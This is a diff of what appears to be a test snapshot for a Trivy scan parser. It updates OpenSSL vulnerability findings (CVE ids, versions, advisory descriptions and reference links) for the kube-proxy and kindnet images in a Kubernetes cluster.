"https://www.cve.org/CVERecord?id=CVE-2021-3712", - "https://www.debian.org/security/2021/dsa-4963", - "https://www.openssl.org/news/secadv/20210824.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-16", - "https://www.tenable.com/security/tns-2022-02", - ], - }, - "category": "Vulnerability", - "description": "ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions) as well as any string whose value has been set with the ASN1_STRING_set() function will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array by directly setting the "data" and "length" fields in the ASN1_STRING array. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed. Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, then a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non NUL terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "openssl: Read buffer overruns processing ASN.1 strings", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3712", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3712", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", - }, - { - "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3712.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9023.html", - }, - { - "type": "URL", - "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - }, - { - "type": "URL", - "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", + "value": "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-02", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", }, { "type": "URL", @@ -162792,307 +162595,223 @@ and the severity is therefore considered low.", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-2", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-3", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5088-1", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3712", + "value": "https://security.netapp.com/advisory/ntap-20220602-0009/", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4963", + "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210824.txt", + "value": "https://ubuntu.com/security/notices/USN-5402-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://ubuntu.com/security/notices/USN-5402-2", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1292", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://www.debian.org/security/2022/dsa-5139", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-16", + "value": "https://www.openssl.org/news/secadv/20220503.txt", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-02", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1d-0+deb10u8", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0778", - "installedVersion": "1.1.1d-0+deb10u6", + "fixedVersion": "1.1.1n-0+deb11u3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2068", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ - "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", - "http://seclists.org/fulldisclosure/2022/May/33", - "http://seclists.org/fulldisclosure/2022/May/35", - "http://seclists.org/fulldisclosure/2022/May/38", - "https://access.redhat.com/errata/RHSA-2022:5326", - "https://access.redhat.com/security/cve/CVE-2022-0778", - "https://bugzilla.redhat.com/2062202", - "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", - "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", - "https://errata.almalinux.org/8/ALSA-2022-5326.html", - "https://errata.rockylinux.org/RLSA-2022:4899", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", - "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", - "https://linux.oracle.com/cve/CVE-2022-0778.html", - "https://linux.oracle.com/errata/ELSA-2022-9272.html", - "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", - "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", - "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220321-0002/", - "https://security.netapp.com/advisory/ntap-20220429-0005/", - "https://support.apple.com/kb/HT213255", - "https://support.apple.com/kb/HT213256", - "https://support.apple.com/kb/HT213257", - "https://ubuntu.com/security/notices/USN-5328-1", - "https://ubuntu.com/security/notices/USN-5328-2", - "https://www.cve.org/CVERecord?id=CVE-2022-0778", - "https://www.debian.org/security/2022/dsa-5103", - "https://www.openssl.org/news/secadv/20220315.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.tenable.com/security/tns-2022-06", - "https://www.tenable.com/security/tns-2022-07", - "https://www.tenable.com/security/tns-2022-08", - "https://www.tenable.com/security/tns-2022-09", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2068", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", + "https://linux.oracle.com/cve/CVE-2022-2068.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", + "https://security.netapp.com/advisory/ntap-20220707-0008/", + "https://ubuntu.com/security/notices/USN-5488-1", + "https://ubuntu.com/security/notices/USN-5488-2", + "https://www.cve.org/CVERecord?id=CVE-2022-2068", + "https://www.debian.org/security/2022/dsa-5169", + "https://www.openssl.org/news/secadv/20220621.txt", ], }, "category": "Vulnerability", - "description": "The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates", + "name": "the c_rehash script allows command injection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0778", - }, - { - "type": "URL", - "value": "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/33", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/35", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/38", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:5326", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0778", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2062202", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", - }, - { - "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2022-5326.html", - }, - { - "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4899", + "value": "https://avd.aquasec.com/nvd/cve-2022-2068", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", + "value": "https://access.redhat.com/security/cve/CVE-2022-2068", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-0778.html", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9272.html", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220321-0002/", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0005/", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213255", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213256", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213257", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5328-1", + "value": "https://linux.oracle.com/cve/CVE-2022-2068.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5328-2", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0778", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5103", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220315.txt", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://security.netapp.com/advisory/ntap-20220707-0008/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://ubuntu.com/security/notices/USN-5488-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-06", + "value": "https://ubuntu.com/security/notices/USN-5488-2", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-07", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2068", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-08", + "value": "https://www.debian.org/security/2022/dsa-5169", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-09", + "value": "https://www.openssl.org/news/secadv/20220621.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-4450", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2023:2165", @@ -163145,7 +162864,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "double free after calling PEM_read_bio_ex", "references": [ @@ -163342,10 +163061,10 @@ and the severity is therefore considered low.", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0215", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2023:2165", @@ -163402,7 +163121,8 @@ and the severity is therefore considered low.", ], }, "category": "Vulnerability", - "description": "The public API function BIO_new_NDEF is a helper function used for streaming + "description": +"The public API function BIO_new_NDEF is a helper function used for streaming ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by end user applications. @@ -163433,8 +163153,9 @@ The OpenSSL cms and smime command line applications are similarly affected. -", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", +" +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "use-after-free following BIO_new_NDEF", "references": [ @@ -163651,10 +163372,10 @@ The OpenSSL cms and smime command line applications are similarly affected. }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0286", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2023:2165", @@ -163714,7 +163435,7 @@ The OpenSSL cms and smime command line applications are similarly affected. }, "category": "Vulnerability", "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "X.400 address type confusion in X.509 GeneralName", "references": [ @@ -163939,10 +163660,10 @@ The OpenSSL cms and smime command line applications are similarly affected. }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u5", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0464", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "https://access.redhat.com/security/cve/CVE-2023-0464", @@ -163951,8 +163672,6 @@ The OpenSSL cms and smime command line applications are similarly affected. "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", - "https://linux.oracle.com/cve/CVE-2023-0464.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", "https://ubuntu.com/security/notices/USN-6039-1", @@ -163962,7 +163681,8 @@ The OpenSSL cms and smime command line applications are similarly affected. ], }, "category": "Vulnerability", - "description": "A security vulnerability has been identified in all supported versions + "description": +"A security vulnerability has been identified in all supported versions of OpenSSL related to the verification of X.509 certificate chains that include policy constraints. Attackers may be able to exploit this @@ -163972,8 +163692,9 @@ exponential use of computational resources, leading to a denial-of-service Policy processing is disabled by default but can be enabled by passing the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", "references": [ @@ -164005,14 +163726,6 @@ the \`-policy' argument to the command line utilities or by calling the "type": "URL", "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0464.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", - }, { "type": "URL", "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", @@ -164042,10 +163755,10 @@ the \`-policy' argument to the command line utilities or by calling the }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u5", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-2650", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "http://www.openwall.com/lists/oss-security/2023/05/30/1", @@ -164055,20 +163768,18 @@ the \`-policy' argument to the command line utilities or by calling the "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", 